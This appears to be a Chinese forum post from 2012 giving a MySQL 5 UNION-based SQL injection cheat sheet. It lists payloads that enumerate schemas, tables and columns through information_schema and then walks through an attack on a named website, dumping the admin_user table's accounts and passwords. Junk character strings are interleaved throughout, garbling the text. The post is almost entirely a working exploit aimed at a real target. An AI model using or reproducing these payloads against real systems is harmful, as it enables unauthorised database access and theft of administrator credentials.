查库
) e3 f; x! i- q4 t7 X- A' Z. C, b6 S+ X: U) S5 p2 O, _+ H( U
id=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/*2 z+ V/ e* k! M) u. X1 i
- d" M2 f9 i; g1 s- H7 d5 q
查表
E9 d8 v) B; x
3 U- i# a9 D+ L) _ R, u0 L9 ~id=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=库的HEX值/**/limit/**/1,15 E% X% z3 t# ]
% ]9 D& t" f: @+ X0 Q查段
7 k* f% E% U1 f- D2 k3 U4 H( a) O1 O2 S G/ B' w
id=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=表的HEX值/**/limit/**/1,18 k7 o2 e3 ^/ a* \) ]* C
' }3 a* ^: }8 W. a2 G* ^" S: ]$ m" x, A) X
mysql5高级注入方法暴表
. k8 o: m3 t8 ~& P( q) C9 V- b. r7 l. W) O( F+ b
例子如下:' \1 q" b# n% m9 e4 s
" x( F' w0 G: j, e; H1.爆表2 ?/ p. k5 q! [: b6 z; b
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574为数据库名的16进制转换yd_teamnet)
) \0 A/ Z+ q, O8 I" q5 K这样爆到第4个时出现了admin_user表。1 u' Z0 D) c0 i
( \ t& r* N6 r4 r+ f2.暴字段
e( r9 ?2 G6 O+ M5 Ohttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*2 I. v0 T7 y1 l1 Y0 g( Z
7 G- h; D. H1 q$ L. d
: `& {7 J/ {" d/ a' f
3.爆密码
+ A2 z: W9 @' d7 h3 w2 q5 b5 d; Dhttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/*
0 g, c6 l I- J8 E: i( h% Y0 o3 K# P5 y5 q0 k J1 h
+ A o' c. u- n/ Z |
发表于 2012-9-13 16:29:37
收藏
支持
反对